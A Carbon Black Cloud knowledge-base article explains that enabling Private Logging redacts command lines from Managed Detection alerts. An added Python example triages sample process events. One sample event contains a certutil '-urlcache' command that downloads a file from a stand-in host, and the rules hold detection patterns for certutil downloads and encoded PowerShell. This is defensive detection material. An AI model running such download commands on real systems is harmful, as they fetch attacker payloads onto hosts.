
Managed Detection: Does Enabling Private Logging Cause the Sent Alerts to Contain Less Information?

Environment

  • CBC Web Console: All Versions
  • Managed Detection

Question

Does enabling Private Logging in a CBC policy cause the alerts sent from the Managed Detection team to contain less information?

Answer

Enabling Private Logging within a policy can prevent the Managed Detection team from sending much of the useful information obtained from an alert, thereby limiting the scope of the Managed Detection alerts.

Additional Notes

  • The most important IOC being considered by the Managed Detection team is typically the command line argument, which is redacted if Private Logging is enabled.
  • Enabling Private Logging can prevent the Managed Detection team from identifying "living off the land" attacks.
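
The following added example (not Carbon Black code, and not part of the original article) shows why the command line matters for "living off the land" triage: the process name alone is the same for benign and suspicious runs of a trusted binary. The event field names, the sample events, the two argument patterns, and the modelling of redaction as a missing `cmdline` value are all assumptions made for illustration.

```python
import re

# Constructed sample events; field names are hypothetical, not the CBC schema.
EVENTS = [
    {"host": "ws-01", "process": "certutil.exe",
     "cmdline": "certutil.exe -verify C:\\certs\\internal-ca.cer"},
    {"host": "ws-02", "process": "certutil.exe",
     "cmdline": "certutil.exe -urlcache -split -f "
                "http://example.invalid/a.txt C:\\Users\\Public\\a.txt"},
    {"host": "ws-03", "process": "powershell.exe",
     "cmdline": "powershell.exe -File C:\\scripts\\inventory.ps1"},
    {"host": "ws-04", "process": "powershell.exe",
     "cmdline": "powershell.exe -NoProfile -EncodedCommand <constructed-placeholder>"},
]

# Illustrative argument patterns, keyed by the trusted binary they apply to.
RULES = {
    "certutil.exe": re.compile(r"-urlcache\b.*\bhttps?://", re.I),
    "powershell.exe": re.compile(r"\s-(e|enc|encodedcommand)\s", re.I),
}

def redact(event):
    """Model Private Logging for this example: the command line is withheld."""
    return {**event, "cmdline": None}

def triage(event):
    """Classify one process event using only the fields available to the analyst."""
    rule = RULES.get(event["process"].lower())
    if rule is None:
        return "ignore"
    if event["cmdline"] is None:
        # A trusted binary ran, but its arguments are unavailable,
        # so benign and suspicious use cannot be told apart.
        return "undetermined"
    return "suspicious" if rule.search(event["cmdline"]) else "benign"

def summarize(events):
    """Map each host to its triage verdict."""
    return {e["host"]: triage(e) for e in events}

if __name__ == "__main__":
    print("full logging:   ", summarize(EVENTS))
    print("private logging:", summarize([redact(e) for e in EVENTS]))
```
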

Article Information

Creation Date: 09-09-2020